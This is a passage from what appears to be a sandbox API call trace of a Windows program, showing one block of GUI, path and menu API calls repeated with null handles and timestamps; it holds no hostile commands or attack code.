param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.478] GetStockObject (i=6) returned 0x1b00018 [0027.478] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.478] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.478] PathFileExistsW (pszPath=0x0) returned 0 [0027.478] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.478] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.478] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.478] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.478] GetMenu (hWnd=0x0) returned 0x0 [0027.478] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.478] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.478] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.478] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.478] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.478] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.478] GetStockObject (i=6) returned 0x1b00018 [0027.478] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.478] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.478] PathFileExistsW (pszPath=0x0) returned 0 [0027.478] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.478] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.478] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.478] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.478] GetMenu (hWnd=0x0) returned 0x0 [0027.478] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x51a) returned -1 [0027.478] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.478] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.478] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.478] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.478] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.479] GetStockObject (i=6) returned 0x1b00018 [0027.479] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.479] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.479] PathFileExistsW (pszPath=0x0) returned 0 [0027.479] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.479] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.479] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.479] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.479] GetMenu (hWnd=0x0) returned 0x0 [0027.479] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.479] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.479] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.479] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.479] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.479] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.479] GetStockObject (i=6) returned 0x1b00018 [0027.479] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.479] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.479] PathFileExistsW (pszPath=0x0) returned 0 [0027.479] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.479] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.479] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.479] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.479] GetMenu (hWnd=0x0) returned 0x0 [0027.479] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.479] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.479] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.479] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.479] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.479] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.479] GetStockObject (i=6) returned 0x1b00018 [0027.479] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.480] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.480] PathFileExistsW (pszPath=0x0) returned 0 [0027.480] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.480] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.480] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.480] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.480] GetMenu (hWnd=0x0) returned 0x0 [0027.480] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.480] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.480] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.480] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.480] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.480] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.480] GetStockObject (i=6) returned 0x1b00018 [0027.480] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.480] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.480] PathFileExistsW (pszPath=0x0) returned 0 [0027.480] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.480] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.480] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.480] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.480] GetMenu (hWnd=0x0) returned 0x0 [0027.480] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.480] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.480] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.480] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.480] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.480] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.480] GetStockObject (i=6) returned 0x1b00018 [0027.480] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.480] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.480] PathFileExistsW (pszPath=0x0) returned 0 [0027.481] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.481] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.481] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.481] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.481] GetMenu (hWnd=0x0) returned 0x0 [0027.481] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x453) returned -1 [0027.481] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.481] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.481] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.481] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.481] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.481] GetStockObject (i=6) returned 0x1b00018 [0027.481] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.481] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.481] PathFileExistsW (pszPath=0x0) returned 0 [0027.481] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.481] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.481] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.481] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.481] GetMenu (hWnd=0x0) returned 0x0 [0027.481] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.481] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.481] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.481] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.481] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.481] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.481] GetStockObject (i=6) returned 0x1b00018 [0027.481] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.481] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.481] PathFileExistsW (pszPath=0x0) returned 0 [0027.481] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.481] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.482] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.482] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.482] GetMenu (hWnd=0x0) returned 0x0 [0027.482] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.482] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.482] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.482] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.482] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.482] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.482] GetStockObject (i=6) returned 0x1b00018 [0027.482] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.482] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.482] PathFileExistsW (pszPath=0x0) returned 0 [0027.482] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.482] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.482] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.482] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.482] GetMenu (hWnd=0x0) returned 0x0 [0027.482] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.482] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.482] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.482] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.482] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.482] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.482] GetStockObject (i=6) returned 0x1b00018 [0027.482] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.482] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.482] PathFileExistsW (pszPath=0x0) returned 0 [0027.482] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.482] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.482] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.482] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.483] GetMenu (hWnd=0x0) returned 0x0 [0027.483] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.483] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.483] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.483] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.483] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.483] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.483] GetStockObject (i=6) returned 0x1b00018 [0027.483] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.483] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.483] PathFileExistsW (pszPath=0x0) returned 0 [0027.483] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.483] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.483] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.483] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.483] GetMenu (hWnd=0x0) returned 0x0 [0027.483] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3be) returned -1 [0027.483] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.483] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.483] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.483] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.483] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.483] GetStockObject (i=6) returned 0x1b00018 [0027.483] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.483] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.483] PathFileExistsW (pszPath=0x0) returned 0 [0027.483] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.483] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.483] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.483] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.483] GetMenu (hWnd=0x0) returned 0x0 [0027.483] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.484] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.484] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.484] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.484] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.484] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.484] GetStockObject (i=6) returned 0x1b00018 [0027.484] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.484] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.484] PathFileExistsW (pszPath=0x0) returned 0 [0027.484] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.484] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.484] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.484] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.484] GetMenu (hWnd=0x0) returned 0x0 [0027.484] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.484] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.484] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.484] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.484] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.484] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.484] GetStockObject (i=6) returned 0x1b00018 [0027.484] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.484] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.484] PathFileExistsW (pszPath=0x0) returned 0 [0027.484] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.484] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.484] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.484] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.484] GetMenu (hWnd=0x0) returned 0x0 [0027.484] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.484] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.484] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.484] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.484] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.485] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.485] GetStockObject (i=6) returned 0x1b00018 [0027.485] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.485] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.485] PathFileExistsW (pszPath=0x0) returned 0 [0027.485] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.485] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.485] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.485] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.485] GetMenu (hWnd=0x0) returned 0x0 [0027.485] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.485] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.485] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.485] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.485] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.485] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.485] GetStockObject (i=6) returned 0x1b00018 [0027.485] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.485] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.485] PathFileExistsW (pszPath=0x0) returned 0 [0027.485] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.485] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.485] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.485] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.485] GetMenu (hWnd=0x0) returned 0x0 [0027.485] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1cf) returned -1 [0027.485] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.485] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.485] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.485] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.485] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.485] GetStockObject (i=6) returned 0x1b00018 [0027.486] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.486] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.486] PathFileExistsW (pszPath=0x0) returned 0 [0027.486] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.486] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.486] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.486] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.486] GetMenu (hWnd=0x0) returned 0x0 [0027.486] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.486] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.486] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.486] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.486] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.486] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.486] GetStockObject (i=6) returned 0x1b00018 [0027.486] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.486] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.486] PathFileExistsW (pszPath=0x0) returned 0 [0027.486] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.486] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.486] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.486] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.486] GetMenu (hWnd=0x0) returned 0x0 [0027.486] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.486] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.486] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.486] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.486] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.486] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.486] GetStockObject (i=6) returned 0x1b00018 [0027.486] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.486] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.486] PathFileExistsW (pszPath=0x0) returned 0 [0027.487] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.487] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.487] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.487] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.487] GetMenu (hWnd=0x0) returned 0x0 [0027.487] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.487] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.487] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.487] GetSubMenu 